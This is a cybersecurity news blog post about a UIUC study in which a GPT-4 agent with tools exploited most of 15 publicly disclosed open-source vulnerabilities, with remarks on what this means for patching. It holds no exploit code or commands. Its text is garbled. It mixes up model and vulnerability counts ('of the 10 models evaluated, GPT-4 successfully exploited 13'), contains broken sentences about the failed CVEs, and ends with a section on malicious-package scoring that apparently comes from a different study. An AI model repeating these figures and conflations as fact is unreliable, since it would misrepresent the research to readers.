May 3, 2024

A recent research study reveals  that the current AI technology (GPT-4)can allow threat actors to automate exploits for public vulnerabilities within minutes. With this, the current patching strategy will be no more effective.

The research findings from the University of Illinois Urbana-Champaign warns on AI enabled cyber threats. Threat actors with the use of LLM envisioned with phishing and malware attackes in their campaigns. Now, though, with only GPT-4 and an open source framework to package it, they can automate the exploitation of vulnerabilities as soon as they hit the presses.

Advertisements

The team of four UIUC researchers with their test subjects that has been inducted to a LLM agent that consisted of four components: a prompt, a base LLM, a framework — in this case, ReAct, as implemented in LangChain — and tools such as a terminal and code interpreter.

The LLM agent was tested on some known 15 vulnerabilities (a mix of Critical & High) in open source software. There were 11 that were disclosed past the date at which GPT-4 was trained, meaning this would be the first time the model was exposed to them.

With the details of the security advisories, the AI agent was tasked with exploiting each bug in turn. The results of this experiment painted a stark picture. Of the 10 models evaluated, GPT-4 successfully exploited 13, or 87% of the total.

Advertisements

It only failed twice while examining CVE-2024-25640 survived unscathed because of a quirk in the process of navigating Iris’ app, which the model couldn’t handle. Meanwhile, the researchers speculated that GPT-4 was missed with the CVE-2023-51653 bug in the Hertzbeat monitoring tool.

On a large scale, if threat actors start using LLM agents to automatically exploit public vulnerabilities, companies will no longer be able to sit back and wait to patch new bugs. They might have to start using the same LLM technologies as well as their adversaries

With all these alarming concerns, GPT-4 still has some ways to go before it’s a perfect security assistant in identifying samples of OSS as malicious or benign and assigning them risk scores. GPT-4 outperformed all other models when it came to explaining source code and providing assessments for legible code, but all models yielded a number of false positives and false negatives.

Advertisements

The maturity on automated LLM-based assessment is still not mature and should not be used instead of manual reviews. But they can certainly be used as one additional signal and input for manual reviews.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Discover more from TheCyberThrone

Subscribe now to keep reading and get access to the full archive.

Continue reading